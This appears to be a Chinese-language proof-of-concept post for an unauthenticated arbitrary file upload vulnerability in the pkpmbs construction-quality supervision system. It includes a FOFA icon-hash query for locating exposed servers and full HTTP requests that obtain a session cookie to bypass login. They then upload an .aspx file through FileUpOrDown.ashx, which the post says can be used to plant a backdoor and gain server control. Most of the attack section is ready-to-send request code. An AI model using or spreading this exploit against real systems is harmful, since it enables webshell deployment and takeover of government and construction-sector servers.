Babing
Published on 2024-08-30 / 2 Visits
0
0

P9-1pkpmbs-建设工程质量监督系统-文件上传

P9-1pkpmbs-建设工程质量监督系统-文件上传

漏洞描述:

pkpmbs 建设工程质量监督系统 FileUpOrDown.aspx、/Platform/System/FileUpload.ashx、接口处存在任意文件上传漏洞,未经身份认证的攻击者可以利用漏洞上传恶意后门文件,从而获取服务器权限。

影响版本:

标准版 <= 2.2023.0328.172228  

网站图片:

image-20240625133612770

网络测绘:

fofa语法:

FOFA:icon_hash=“2001627082”

漏洞复现:

payload:

GET /Login.cshtml HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

效果图:
取有效cookie,绕过权限认证
image-20240619151405854
携带cookie,上传文件

POST /Applications/Forms/SearchSetting/FileUpOrDown.ashx?operation=Fileupload&extName=.aspx&&searchConfigName=上传的文件名 HTTP/1.1
Host: your-ip
Cookie: your-cookie
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqACRhAMBHmQQAUP
Content-Length: 185

------WebKitFormBoundarybqACRhAMBHmQQAUP
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: image/png

test
------WebKitFormBoundarybqACRhAMBHmQQAUP--

image-20240619151411155
回显了上传路径,验证
image-20240619151420270


Comment